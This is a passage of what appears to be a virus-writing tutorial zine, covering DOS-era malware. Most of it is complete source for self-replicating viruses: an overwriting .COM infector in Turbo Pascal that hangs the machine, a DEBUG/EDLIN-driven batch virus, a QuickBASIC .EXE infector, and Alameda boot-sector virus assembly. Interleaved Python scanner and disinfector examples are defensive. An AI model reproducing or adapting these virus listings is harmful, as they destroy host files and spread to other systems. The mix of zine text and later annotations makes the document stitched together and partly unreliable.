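    body = bytearray(0x400)
    body[AIDS_OFFSET:AIDS_OFFSET + len(AIDS_MARK)] = AIDS_MARK
    return bytes(body)


def sample_appender() -> bytes:
    """A 0x400-byte host with 0x300 bytes appended and an E9 jump patched at entry."""
    host = bytearray(sample_clean()[:0x400].ljust(0x400, b"\0"))
    appended = b"\x90" * 0x300
    rel = len(host) - 3                       # JMP is 3 bytes; target is the first appended byte
    host[0:3] = b"\xE9" + rel.to_bytes(2, "little", signed=True)
    return bytes(host) + appended


if __name__ == "__main__":
    for name, sample in (("clean", sample_clean()), ("generic", sample_generic()),
                         ("aids", sample_aids()), ("appender", sample_appender())):
        print(f"{name:9s} {scan_com(sample) or ['no findings']}")
```

The two marker checks are exact and cheap; the tail-jump heuristic is the one to
tune, since legitimate COM files occasionally start with a jump over a data area
as well.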
Again, neither CPI nor the author of Number One or AIDS endorses this document or program for use in any illegal manner. Also, neither CPI nor the author of Number One and AIDS is responsible for any actions by the readers that may prove harmful in any way. This package was written for EDUCATIONAL purposes only!

{ Beginning of source code, Turbo Pascal 3.01a }
{$C-} {$U-} {$I-}   { No Ctrl-C or user break; automatic I/O checking OFF so that
                      IOresult can be tested after Reset instead of aborting }

{ -- Constants --------------------------------------- }
Const
  VirusSize = 13847;                            { AIDS's code size }
  Warning : String[42]                          { Warning message }
          = 'This File Has Been Infected By AIDS! HaHa!';

{ -- Type declarations------------------------------------- }
Type
  DTARec = Record                               { Data area for file search (DOS DTA) }
    DOSnext  : Array[1..21] of Byte;            { reserved for DOS (find-next state) }
    Attr     : Byte;
    Ftime, FDate, FLsize, FHsize : Integer;
    FullName : Array[1..13] of Char;            { ASCIIZ name, 8.3 plus terminator }
  End;

  Registers = Record                            { Register set used for file search }
    Case Byte of
      1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
      2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte);
  End;

{ -- Variables--------------------------------------------- }
Var
  ProgramStart : Byte absolute Cseg:$100;       { Memory offset of program code }
  MarkInfected : String[42] absolute Cseg:$180; { Infected marker, $80 bytes into the image }
  Reg          : Registers;                     { Register set }
  DTA          : DTARec;                        { Data area }
  Buffer       : Array[Byte] of Byte;           { Data buffer, 256 bytes }
  TestID       : String[42];                    { To recognize infected files }
  UsePath      : String[66];                    { Path to search files }
  UsePathLenght: Byte absolute UsePath;         { Length of search path (the string's length byte) }
  Go           : File;                          { File to infect }
  B            : Byte;                          { Scratch: position of #0 in the name }
  LoopVar      : Integer;                       { Used for the 1-in-10 payload and the hang }

{ -- Program code------------------------------------------ }
Begin
  GetDir(0, UsePath);                           { get current directory }
  if Pos('\', UsePath) <> UsePathLenght then    { add a backslash unless it is the root }
    UsePath := UsePath + '\';
  UsePath := UsePath + '*.COM';                 { Define search mask }
  Reg.AH := $1A;                                { Set data area (DOS Set DTA) }
  Reg.DS := Seg(DTA);
  Reg.DX := Ofs(DTA);
  MsDos(Reg);
  UsePath[Succ(UsePathLenght)] := #0;           { Path must end with #0 }
  Reg.AH := $4E;                                { DOS Find First }
  Reg.DS := Seg(UsePath);
  Reg.DX := Ofs(UsePath[1]);
  Reg.CX := $ff;                                { Set attribute to find ALL files }
  MsDos(Reg);                                   { Find first matching entry }
  IF not Odd(Reg.Flags) Then                    { Carry clear: a file was found }
    Repeat
      UsePath := DTA.FullName;
      B := Pos(#0, UsePath);
      If B > 0 then
        Delete(UsePath, B, 255);                { Remove garbage after the terminator }
      Assign(Go, UsePath);
      Reset(Go);
      If IOresult = 0 Then                      { If no I/O error then }
      Begin
        BlockRead(Go, Buffer, 2);               { read two 128-byte blocks }
        Move(Buffer[$80], TestID, 43);          { Test if file already ill (infected) }
        If TestID <> Warning Then               { If not then ... }
        Begin
          Seek(Go, 0);                          { Mark file as infected and .. }
          MarkInfected := Warning;              { Infect it: overwrite from offset 0 }
          BlockWrite(Go, ProgramStart, Succ(VirusSize shr 7));
          Close(Go);
          Halt;                                 { .. and halt: one host per run }
        End;
        Close(Go);
      End;
      { The file has already been infected, search next. }
      Reg.AH := $4F;                            { DOS Find Next }
      Reg.DS := Seg(DTA);
      Reg.DX := Ofs(DTA);
      MsDos(Reg);
    Until Odd(Reg.Flags);                       { ... until no more files are found }

  Loopvar := Random(10);
  If Loopvar = 7 then                           { one run in ten: show the message and hang }
  begin
    Writeln(' ');                               { Give a lot of smiles (the smiley
                                                  characters did not survive this copy) }
    Writeln('');
    Writeln(' ');
    Writeln('  ATTENTION: ');
    Writeln('  I have been elected to inform you that throughout your process of ');
    Writeln('  collecting and executing files, you have accidentally FUCKED ');
    Writeln('  yourself over; again, that''s PHUCKED yourself over. No, it cannot ');
    Writeln('  be; YES, it CAN be, a VIRUS has infected your system. Now what do ');
    Writeln('  you have to say about that? HAHAHAHA. Have FUN with this one and ');
    Writeln('  remember, there is NO cure for ');
    Writeln('  ');
    { Ten lines of CP437 block-character art spelling "AIDS" followed here; the
      characters are garbled in this copy, so the banner is reduced to plain text. }
    Writeln('  A I D S ');
    Writeln('  ');
    Writeln(' ');
    REPEAT LOOPVAR := 0; UNTIL LOOPVAR = 1;     { never true: hang the machine }
  end;
End.

{ Although this is a primitive virus, it is effective. Only .COM files in the
  current directory are infected, one per run. The virus is about 13K; because
  it overwrites the host from offset 0, the host's original code is destroyed
  and the file's date entry changes. }

[2.7] Batch Viruses
-------------

Whoever thought that viruses could live in a BATCH file? The virus we are about to see makes use of the MS-DOS operating system itself: it is driven by the DEBUG and EDLIN programs that ship with DOS.

Name: VR.BAT

echo = off          ( Self explanatory )
ctty nul            ( This is important. Console output is turned off )
path c:\msdos       ( May differ on other systems )
dir *.com/w>ind     ( The directory is written to "ind"; /W gives name entries ONLY )
edlin ind<1         ( "ind" is processed with EDLIN so only file names remain )
debug ind<2         ( New batch program is created with DEBUG )
edlin name.bat<3    ( This batch goes to an executable form because of EDLIN )
ctty con            ( Console interface is again assigned )
name                ( Newly created NAME.BAT is called )
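Back to the AIDS program of section 2.6 for a moment (the batch virus continues below). The only test that program makes on a candidate host is to compare 43 bytes at file offset $80 with its own warning string, stored as a Turbo Pascal String[42] (length byte 2Ah followed by 42 characters) at Cseg:$180, which is $80 bytes into a .COM image since a .COM loads at offset $100. The following is an added example, not code from the zine, that applies the same test defensively: it scans the *.COM files in a directory, flags any file carrying the marker, and separately flags a marked file that is shorter than the 109 blocks of 128 bytes the virus writes, which the virus itself never produces (it seeks to 0 and overwrites, so a host can only grow). The file and directory names are whatever the caller passes in; nothing here is taken from a real sample.

```python
"""Scan .COM files for the infection marker the AIDS program above plants.

Added example for section 2.6; this is not code from the zine.  It applies the
virus's own test defensively: the warning text lives at Cseg:$180, i.e. 0x80
bytes into a .COM image, as a length byte (0x2A) followed by 42 characters."""

import os

WARNING = b"This File Has Been Infected By AIDS! HaHa!"
MARKER = bytes([len(WARNING)]) + WARNING   # Pascal string: length byte + text
MARKER_OFFSET = 0x80                       # Cseg:$180 - $100
VIRUS_SIZE = 13847                         # VirusSize constant in the listing
BLOCK = 128                                # Turbo Pascal 3 untyped-file block
# BlockWrite(Go, ProgramStart, Succ(VirusSize shr 7)) writes whole 128-byte
# blocks, so an infected host starts with at least this many bytes of virus.
WRITTEN_BYTES = ((VIRUS_SIZE >> 7) + 1) * BLOCK   # 13952


def is_marked(data: bytes) -> bool:
    """Exactly the comparison the virus makes: 43 bytes at 0x80 vs. the marker."""
    return data[MARKER_OFFSET:MARKER_OFFSET + len(MARKER)] == MARKER


def classify(data: bytes) -> str:
    """'clean', 'infected', or 'suspicious' for one .COM image.

    'suspicious' means the marker is present but the file is shorter than the
    image the virus writes, which the virus never produces: it seeks to 0 and
    overwrites without truncating, so a host can only grow, never shrink."""
    if not is_marked(data):
        return "clean"
    return "infected" if len(data) >= WRITTEN_BYTES else "suspicious"


def scan_directory(path: str) -> dict:
    """Map file name -> classification for every *.COM file in one directory,
    mirroring the virus's own *.COM search of the current directory."""
    results = {}
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if name.lower().endswith(".com") and os.path.isfile(full):
            with open(full, "rb") as fh:
                # the first WRITTEN_BYTES + 1 bytes are enough for both checks
                results[name] = classify(fh.read(WRITTEN_BYTES + 1))
    return results


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, verdict in scan_directory(target).items():
        print(f"{verdict:10s} {name}")
```

Because the virus overwrites the host from offset 0 and then halts, an infected .COM cannot be repaired from its own contents; the only remedy is to delete it and restore a clean copy. The check is an exact signature taken from this one sample, so a variant that changes the Warning string walks straight past it; that is the limit of every marker-based scanner, including the one the virus itself uses to avoid double infection.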
In addition to this batch file, there are three command files, here named 1, 2 and 3.

Here is the first command file:
-------------------------------
Name: 1

1,4d                 ( Lines 1-4 of the "IND" file, the DIR header, are deleted )
e                    ( Save file and exit )

Here is the second command file:
--------------------------------
Name: 2

m100,10b,f000        ( First program name, 12 bytes, is moved to address F000H to save it )
e108 ".BAT"          ( Extension of the file name is changed to .BAT )
m100,10b,f010        ( File name with .BAT is saved again, at F010H )
e100"DEL "           ( DEL command is written at address 100H )
mf000,f00b,104       ( Original file name is written after this command )
e10c 2e              ( Period is placed in front of the extension )
e110 0d,0a           ( Carriage return + line feed )
mf010,f020,11f       ( Modified file name is moved from the buffer area to 11FH )
e112 "COPY \VR.BAT " ( COPY command is placed in front of that file name; the trailing
                       space keeps the command and the name apart )
e12b 0d,0a           ( COPY command terminated with carriage return + line feed )
rcx                  ( The CX register, which tells W how many bytes to write, is ... )
2c                   ( ... set to 2CH on the value line DEBUG prompts for )
nname.bat            ( Name the output file NAME.BAT )
w                    ( Write )
q                    ( Quit )

The third command file must be shown as a hex dump because it contains control characters (1Ah = Control-Z) and is not entirely printable.

Hex dump of the third command file:
-----------------------------------
Name: 3

0100  31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79   1,1?R ..nyyyyyyy
0110  79 29 0D 32 2C 32 3F 52-20 1A 0D 6E 6E 79 79 79   y).2,2?R ..nnyyy
0120  79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00   yyyy).E.........

This is an EDLIN script: "1,1?R" followed by a space, Control-Z and an empty replacement asks, for each space in line 1 of NAME.BAT, whether it may be deleted; the n/y answers keep the separating space after DEL and remove the padding that DIR /W puts after short file names, and "2,2?R" does the same for the COPY line, keeping two spaces. "E" saves the file and exits.

In order for this virus to work, VR.BAT must be in the root directory. This program only affects .COM files.

[2.8] Viruses in Basic
----------------------

BASIC is a great language, and people often think of it as a limited language that will not be of any use in creating something like a virus. Well, you are really wrong. Let's take a look at a BASIC virus created by R. Burger in 1987.
This program is an overwriting virus and uses the MS-DOS SHELL command to infect .EXE files. To build it you must compile the source with Microsoft QuickBASIC. Note the length of the compiled and linked .EXE file and edit the source to place that length in the LENGHTVIR variable. BV3.EXE must be in the current directory, COMMAND.COM must be available, LENGHTVIR must be set to the length of the linked program, and remember to use the /e parameter when compiling.

10 REM ** DEMO
20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
30 REM ** BASIC DOESNT SUCK
40 REM ** NO KIDDING
50 ON ERROR GOTO 670
60 REM *** LENGHTVIR MUST BE SET **
70 REM *** TO THE LENGHT TO THE **
80 REM *** LINKED PROGRAM ***
90 LENGHTVIR=2641
100 VIRROOT$="BV3.EXE"
110 REM *** WRITE THE DIRECTORY IN THE FILE "INH"
130 SHELL "DIR *.EXE>INH"
140 REM ** OPEN "INH" FILE AND READ NAMES **
150 OPEN "R",1,"INH",32000
160 GET #1,1
170 LINE INPUT#1,ORIGINAL$
180 LINE INPUT#1,ORIGINAL$
190 LINE INPUT#1,ORIGINAL$
200 LINE INPUT#1,ORIGINAL$
210 ON ERROR GOTO 670
220 CLOSE#2
230 F=1:LINE INPUT#1,ORIGINAL$
240 REM ** "%" IS THE MARKER OF THE BV3
250 REM ** "%" IN THE NAME MEANS
260 REM ** INFECTED COPY PRESENT
270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210
280 ORIGINAL$=MID$(ORIGINAL$,1,13)
290 EXTENSION$=MID$(ORIGINAL$,9,13)
300 MID$(EXTENSION$,1,1)="."
310 REM *** CONCATENATE NAMES INTO FILENAMES **
320 F=F+1
330 IF MID$(ORIGINAL$,F,1)=" " OR MID$(ORIGINAL$,F,1)="." OR F=13 THEN GOTO 350
340 GOTO 320
350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
360 ON ERROR GOTO 210
365 TEST$=""
370 REM ++ OPEN FILE FOUND +++
380 OPEN "R",2,ORIGINAL$,LENGHTVIR
390 IF LOF(2) < LENGHTVIR THEN GOTO 420
400 GET #2,2
410 LINE INPUT#1,TEST$
420 CLOSE#2
431 REM ++ CHECK IF PROGRAM IS ILL ++
440 REM ++ "%" AT THE END OF THE FILE MEANS..
450 REM ++ FILE IS ALREADY SICK ++
460 REM IF MID$(TEST$,2,1)="%" THEN GOTO 210
470 CLOSE#1
480 ORIGINALS$=ORIGINAL$
490 MID$(ORIGINALS$,1,1)="%"
499 REM ++++ SAVE "HEALTHY" PROGRAM ++++
510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$
520 SHELL C$
530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
540 C$="COPY "+VIRROOT$+" "+ORIGINAL$
550 SHELL C$
560 REM *** APPEND VIRUS MARKER ***
570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
580 WRITE#1,ORIGINALS$
590 CLOSE#1
630 REM ++ OUTPUT MESSAGE ++
640 PRINT "INFECTION IN ";ORIGINAL$;" !! BE WARE !!"
650 SYSTEM
660 REM ** VIRUS ERROR MESSAGE
670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM
680 END

This BASIC virus will only attack .EXE files. After execution you will see an "INH" file, which contains the directory listing, and a file such as %SORT.EXE. Programs whose names start with "%" are NOT infected; they are the backup copies of the originals.

;[2.9] The Alameda Virus
;-----------------------------------------------------------------------;
; This virus is of the "FLOPPY ONLY" variety.
; It replicates to the boot sector of a floppy disk and when it gains
; control it will move itself to upper memory. It redirects the keyboard
; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences, at which time
; it will attempt to infect any floppy it finds in drive A:.
; It keeps the real boot sector at track 39, sector 8, head 0.
; It does not map this sector bad in the FAT (unlike the Pakistani Brain),
; and should that area be used by a file, the virus will die. It also
; contains no anti-detection mechanisms as the BRAIN virus does. It
; apparently uses head 0, sector 8 and not head 1, sector 9 because this
; is common to all floppy formats, both single sided and double sided.
; It does not contain any malevolent TROJAN HORSE code. It does appear to
; contain a count of how many times it has infected other diskettes,
; although this is harmless and the count is never accessed.
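The description above gives everything a disinfector needs: the virus lives in sector 0, keeps the real boot sector at track 39, head 0, sector 8, and does not protect that sector in the FAT, so a file written there destroys both the virus and the only copy of the original. The following is an added example, not code from the zine, that does on a raw floppy image what the DOS SYS utility does on a real disk: locate the stash, check that it still looks like a boot sector, and write it back over sector 0. It goes a little beyond the listing by handling the common PC floppy geometries rather than only the 360K case. Two things are assumptions of mine rather than facts from the page: the detection signature is the machine code I expect for two instructions in the listing ("CMP DI,3456H" as 81 FF 56 34 and "DEC Word Ptr [0413H]" as FF 0E 13 04), and the image is laid out in the usual cylinder/head/sector order. No real sample is used; the tests build both sectors from scratch.

```python
"""Detect the Alameda boot-sector virus in a raw floppy image and put back the
original boot sector it hides at track 39, head 0, sector 8.

Added example for section 2.9; not code from the zine.  Assumptions: the
signature bytes are the encoding of "CMP DI,3456H" and "DEC Word Ptr [0413H]"
from the listing, and the image is a plain CHS-ordered dump."""

SECTOR = 512
SIGNATURES = (bytes.fromhex("81ff5634"), bytes.fromhex("ff0e1304"))
STASH_CYL, STASH_HEAD, STASH_SECT = 39, 0, 8   # CH=27H, DH=0, CL=8 in the listing

# Raw image size -> (heads, sectors per track) for the common PC floppy formats.
GEOMETRIES = {
    163840: (1, 8), 184320: (1, 9), 327680: (2, 8), 368640: (2, 9),
    737280: (2, 9), 1228800: (2, 15), 1474560: (2, 18),
}


def chs_to_lba(cyl: int, head: int, sect: int, heads: int, spt: int) -> int:
    """CHS -> linear sector number (tracks and heads 0-based, sectors 1-based)."""
    return (cyl * heads + head) * spt + (sect - 1)


def stash_offset(image: bytes) -> int:
    """Byte offset of the sector where the virus keeps the real boot sector."""
    try:
        heads, spt = GEOMETRIES[len(image)]
    except KeyError:
        raise ValueError("unrecognised floppy image size %d" % len(image))
    return chs_to_lba(STASH_CYL, STASH_HEAD, STASH_SECT, heads, spt) * SECTOR


def looks_like_boot_sector(sector: bytes) -> bool:
    """Cheap plausibility test for a DOS boot sector: JMP at 0, 55AA at the end."""
    return (len(sector) == SECTOR
            and sector[0] in (0xEB, 0xE9)
            and sector[510:] == b"\x55\xaa")


def is_infected(image: bytes) -> bool:
    """True when sector 0 contains both signature byte strings."""
    boot = image[:SECTOR]
    return all(sig in boot for sig in SIGNATURES)


def recover_original_boot_sector(image: bytes):
    """The stashed boot sector, or None if a file has since overwritten it
    (the listing notes the sector is not marked bad in the FAT)."""
    off = stash_offset(image)
    stashed = image[off:off + SECTOR]
    return stashed if looks_like_boot_sector(stashed) else None


def disinfect(image: bytes):
    """Copy of the image with the original boot sector restored to sector 0.
    Returns the image unchanged if not infected, None if the stash is gone."""
    if not is_infected(image):
        return bytes(image)
    original = recover_original_boot_sector(image)
    if original is None:
        return None
    return original + image[SECTOR:]


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:
        img = fh.read()
    fixed = disinfect(img)
    print("infected" if is_infected(img) else "clean",
          "- recoverable" if fixed is not None else "- original boot sector lost")
    if fixed is not None and fixed != img:
        with open(sys.argv[1] + ".cleaned", "wb") as fh:
            fh.write(fixed)
```

The virus decides whether a disk is already infected by comparing the first 0E6H bytes of the freshly read boot sector with itself (the REPE CMPSB in RE_INFECT); the two short signatures here are a looser form of that same test, and like every signature they only recognise this version. The plausibility check on the stash is what separates "clean this disk" from "the original is gone, re-create the boot sector with SYS": on a 360K disk the stash sits at linear sector 709, well inside the data area, and any file that grows into it takes the original boot sector with it.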
;
; Things to note about this virus:
; It can not only live through an ALT-CTRL-DEL reboot command, but this
; is its primary (only, for that matter) means of reproduction to other
; floppy diskettes. The only way to remove it from an infected system
; is to turn the machine off and reboot an uninfected copy of DOS.
; It is even resident when no floppy is booted but BASIC is loaded
; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC,
; it activates and infects the floppy from which the user is
; attempting to boot.
;
; Also note that because of the POP CS command used to pass control to
; itself in upper memory, this virus does not work on 80286
; machines (POP CS is not a valid 80286 instruction).
;
; If your assembler will not allow the POP CS command, replace it
; with a NOP, assemble, then debug that part of the code and place
; POP CS in place of the NOP at that section.
;
; The Norton Utilities can be used to identify infected diskettes by
; looking at the boot sector, and the DOS SYS utility can be used to
; remove it (unlike the Pakistani Brain).
;-----------------------------------------------------------------------;
;
        ORG     7C00H
;
TOS     LABEL   WORD                    ;TOP OF STACK
;-----------------------------------------------------------------------;
; 1. Find top of memory and copy ourself up there (keeping same offset)
; 2. Save a copy of the first 32 interrupt vectors to top of memory too
; 3. Redirect int 9 (keyboard) to ourself in top of memory
; 4. Jump to ourself at top of memory
; 5. Load and execute REAL boot sector from track 39 (CH=27H, counting
;    from 0), head 0, sector 8
;-----------------------------------------------------------------------;
BEGIN:  CLI                             ;INITIALIZE STACK
        XOR     AX,AX
        MOV     SS,AX
        MOV     SP,offset TOS
        STI
;
        MOV     BX,0040H                ;ES = TOP OF MEMORY - (7C00H+512)
        MOV     DS,BX
        MOV     AX,[0013H]              ; 0040:0013 = MEMORY SIZE IN KB
        MUL     BX                      ; KB * 64 = PARAGRAPHS
        SUB     AX,07E0H                ; (7C00H+512)/16
        MOV     ES,AX
;
        PUSH    CS                      ;DS = CS
        POP     DS
;
        CMP     DI,3456H                ;IF THE VIRUS IS REBOOTING...
        JNE     B_10
        DEC     Word Ptr [COUNTER_1]    ;...LOW&HI:COUNTER_1--
;
B_10:   MOV     SI,SP                   ;SP=7C00  ;COPY SELF TO TOP OF MEMORY
        MOV     DI,SI
        MOV     CX,512
        CLD
        REP     MOVSB
;
        MOV     SI,CX                   ;CX=0  ;SAVE FIRST 32 INT VECTOR ADDRESSES TO
        MOV     DI,offset BEGIN - 128   ; 128 BYTES BELOW OUR HI CODE
        MOV     CX,128
        REP     MOVSB
;
        CALL    PUT_NEW_09              ;SAVE/REDIRECT INT 9 (KEYBOARD)
;
        PUSH    ES                      ;ES=HI  ; JUMP TO OUR HI CODE WITH
        POP     CS                      ;         POP CS (8088 ONLY)
;
        PUSH    DS                      ;DS=0   ; ES = DS
        POP     ES
;
        MOV     BX,SP                   ;SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00
        MOV     DX,CX                   ;CX=0    ;DRIVE A: HEAD 0
        MOV     CX,2708H                ; TRACK 39, SECTOR 8
        MOV     AX,0201H                ; READ 1 SECTOR
        INT     13H                     ; (common to 8/9 sect. 1/2 sided!)
        JB      $                       ; HANG IF ERROR
;
        JMP     JMP_BOOT                ;JMP 0000:7C00
;
;-----------------------------------------------------------------------;
; SAVE THEN REDIRECT INT 9 VECTOR
;
; ON ENTRY: DS = 0
;           ES = WHERE TO SAVE OLD_09 (HI) AND WHERE NEW_09 IS (HI)
;-----------------------------------------------------------------------;
PUT_NEW_09:
        DEC     Word Ptr [0413H]        ;TOP OF MEMORY (0040:0013) -= 1024
;
        MOV     SI,9*4                  ;COPY INT 9 VECTOR TO
        MOV     DI,offset OLD_09        ; OLD_09 (IN OUR HI CODE!)
        MOV     CX,0004
;
        CLI
        REP     MOVSB
        MOV     Word Ptr [9*4],offset NEW_09
        MOV     [(9*4)+2],ES
        STI
;
        RET
;
;-----------------------------------------------------------------------;
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR
;-----------------------------------------------------------------------;
ACK_KEYBD:
        IN      AL,61H                  ;RESET KEYBOARD THEN CONTINUE
        MOV     AH,AL
        OR      AL,80H
        OUT     61H,AL
        XCHG    AL,AH
        OUT     61H,AL
        JMP     RBOOT
;
;-----------------------------------------------------------------------;
; DATA AREA WHICH IS NOT USED IN THIS VERSION
; REASON UNKNOWN
;-----------------------------------------------------------------------;
TABLE   DB      27H,0,1,2               ;FORMAT INFORMATION FOR TRACK 39
        DB      27H,0,2,2               ; (CURRENTLY NOT USED)
        DB      27H,0,3,2
        DB      27H,0,4,2
        DB      27H,0,5,2
        DB      27H,0,6,2
        DB      27H,0,7,2
        DB      27H,0,8,2
;
;A7C9A  LABEL   BYTE
        DW      00024H                  ;NOT USED
        DB      0ADH
        DB      07CH
        DB      0A3H
        DW      00026H
;
;L7CA1:
        POP     CX                      ;NOT USED
        POP     DI
        POP     SI
        POP     ES
        POP     DS
        POP     AX
        POPF
        JMP     1111:1111
;
;-----------------------------------------------------------------------;
; IF ALT & CTRL & DEL THEN ...
; IF ALT & CTRL & ? THEN ...
;-----------------------------------------------------------------------;
NEW_09: PUSHF
        STI
;
        PUSH    AX
        PUSH    BX
        PUSH    DS
;
        PUSH    CS                      ;DS=CS
        POP     DS
;
        MOV     BX,Word Ptr [ALT_CTRL]  ;BX=SCAN CODE LAST TIME
        IN      AL,60H                  ;GET SCAN CODE
        MOV     AH,AL                   ;SAVE IN AH
        AND     AX,887FH                ;STRIP 8th BIT IN AL, KEEP 8th BIT IN AH
;
        CMP     AL,1DH                  ;IS IT A [CTRL]...
        JNE     N09_10                  ;...JUMP IF NO
        MOV     BL,AH                   ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
        JMP     N09_30
;
N09_10: CMP     AL,38H                  ;IS IT AN [ALT]...
        JNE     N09_20                  ;...JUMP IF NO
        MOV     BH,AH                   ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
        JMP     N09_30
;
N09_20: CMP     BX,0808H                ;IF (CTRL DOWN & ALT DOWN)...
        JNE     N09_30                  ;...JUMP IF NO
;
        CMP     AL,17H                  ;IF [I]...
        JE      N09_X0                  ;...JUMP IF YES
        CMP     AL,53H                  ;IF [DEL]...
        JE      ACK_KEYBD               ;...JUMP IF YES
;
N09_30: MOV     [ALT_CTRL],BX           ;SAVE SCAN CODE FOR NEXT TIME
;
N09_90: POP     DS
        POP     BX
        POP     AX
        POPF
;
        DB      0EAH                    ;JMP FAR TO THE SAVED INT 9 (E.G. F000:E987)
OLD_09  DW      ?
        DW      0F000H
;
N09_X0: JMP     N09_X1
;
;-----------------------------------------------------------------------;
; ALT-CTRL-DEL SEEN: RESET THE SCREEN, RESTORE VECTORS, HOOK INT 19
; AND WARM-BOOT THROUGH THE BIOS
;-----------------------------------------------------------------------;
RBOOT:  MOV     DX,03D8H                ;DISABLE COLOR VIDEO !?!?
        MOV     AX,0800H                ;AL=0, AH=DELAY ARG
        OUT     DX,AL
        CALL    DELAY
        MOV     [ALT_CTRL],AX           ;AX=0
;
        MOV     AL,3                    ;AH=0  ;SELECT 80x25 COLOR
        INT     10H
        MOV     AH,2                    ;SET CURSOR POS 0,0
        XOR     DX,DX
        MOV     BH,DH                   ; PAGE 0
        INT     10H
;
        MOV     AH,1                    ;SET CURSOR TYPE
        MOV     CX,0607H
        INT     10H
;
        MOV     AX,0420H                ;DELAY (AL=20H FOR EOI BELOW)
        CALL    DELAY
;
        CLI
        OUT     20H,AL                  ;SEND EOI TO INT CONTROLLER
;
        MOV     ES,CX                   ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
        MOV     DI,CX                   ; (REMOVING OUR INT 09 HANDLER!)
        MOV     SI,offset BEGIN - 128
        MOV     CX,128
        CLD
        REP     MOVSB
;
        MOV     DS,CX                   ;CX=0  ;DS=0
;
        MOV     Word Ptr [19H*4],offset NEW_19  ;SET INT 19 VECTOR
        MOV     [(19H*4)+2],CS
;
        MOV     AX,0040H                ;DS = ROM DATA AREA
        MOV     DS,AX
;
        MOV     [0017H],AH              ;AH=0  ;KBFLAG (SHIFT STATES) = 0
        INC     Word Ptr [0013H]        ;MEMORY SIZE += 1024 (WE'RE NOT ACTIVE)
;
        PUSH    DS                      ;IF BIOS F000:E502 == 21E4...
        MOV     AX,0F000H
        MOV     DS,AX
        CMP     Word Ptr [0E502H],21E4H
        POP     DS
        JE      R_90
        INT     19H                     ; IF NOT...REBOOT
;
R_90:   JMP     0F000:0E502H            ;...DO IT ?!?!?!
;
;-----------------------------------------------------------------------;
; REBOOT INT VECTOR
;-----------------------------------------------------------------------;
NEW_19: XOR     AX,AX
;
        MOV     DS,AX                   ;DS=0
        MOV     AX,[0410H]              ;AX=EQUIP FLAG
        TEST    AL,1                    ;IF FLOPPY DRIVES ...
        JNZ     N19_20                  ;...JUMP
N19_10: PUSH    CS                      ;ELSE ES=CS
        POP     ES
        CALL    PUT_NEW_09              ;SAVE/REDIRECT INT 9 (KEYBOARD)
        INT     18H                     ;LOAD BASIC
;
N19_20: MOV     CX,0004                 ;RETRY COUNT = 4
;
N19_22: PUSH    CX
        MOV     AH,00                   ;RESET DISK
        INT     13H
        JB      N19_81
        MOV     AX,0201H                ;READ BOOT SECTOR
        PUSH    DS
        POP     ES
        MOV     BX,offset BEGIN
        MOV     CX,1                    ;TRACK 0, SECTOR 1
        INT     13H
N19_81: POP     CX
        JNB     N19_90
        LOOP    N19_22
        JMP     N19_10                  ;IF RETRY EXPIRED...LOAD BASIC
;
;-----------------------------------------------------------------------;
; Reinfection segment.
;-----------------------------------------------------------------------;
N19_90: CMP     DI,3456H                ;IF NOT FLAG SET...
        JNZ     RE_INFECT               ;...RE INFECT
;
JMP_BOOT:                               ;PASS CONTROL TO BOOT SECTOR
        JMP     0000:7C00H
;
;-----------------------------------------------------------------------;
; Reinfection Segment.
;-----------------------------------------------------------------------;
RE_INFECT:
        MOV     SI,offset BEGIN         ;COMPARE BOOT SECTOR JUST LOADED WITH
        MOV     CX,00E6H                ; OURSELF (FIRST 0E6H BYTES)
        MOV     DI,SI
        PUSH    CS
        POP     ES
        CLD
        REPE    CMPSB
        JE      RI_12                   ;IF EQUAL, ALREADY INFECTED: SKIP
;                                       ;IF NOT EQUAL, FALL THROUGH AND INFECT
        INC     Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
;
;                                       ;MAKE SURE TRACK 39, HEAD 0 FORMATTED
        MOV     BX,offset TABLE         ;FORMAT INFO
        MOV     DX,0000                 ;DRIVE A: HEAD 0
        MOV     CH,40-1                 ;TRACK 39
        MOV     AH,5                    ;FORMAT
        JMP     RI_10                   ;REMOVE THE FORMAT OPTION FOR NOW !
;
; <<< NO EXECUTION PATH TO HERE >>>
        JB      RI_80
;
;                                       ;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
RI_10:  MOV     ES,DX                   ;ES:BX = 0000:7C00, HEAD=0
        MOV     BX,offset BEGIN         ;CH=39 (TRACK 39) STILL SET FROM ABOVE
        MOV     CL,8                    ;SECTOR 8
        MOV     AX,0301H                ;WRITE 1 SECTOR
        INT     13H
;
        PUSH    CS                      ; (ES=CS FOR PUT_NEW_09 BELOW)
        POP     ES
        JB      RI_80                   ;IF WRITE ERROR...JUMP TO BOOT CODE
;
        MOV     CX,0001                 ;WRITE INFECTED BOOT SECTOR (FROM HI COPY) !
        MOV     AX,0301H
        INT     13H
        JB      RI_80                   ; IF ERROR...JUMP TO BOOT CODE
;
RI_12:  MOV     DI,3456H                ;SET "JUST INFECTED ANOTHER ONE"...
        INT     19H                     ;...FLAG AND REBOOT
;
RI_80:  CALL    PUT_NEW_09              ;SAVE/REDIRECT INT 9 (KEYBOARD)
        DEC     Word Ptr ES:[COUNTER_1] ; (DEC. BECAUSE WE DIDN'T INFECT)
        JMP     JMP_BOOT
;
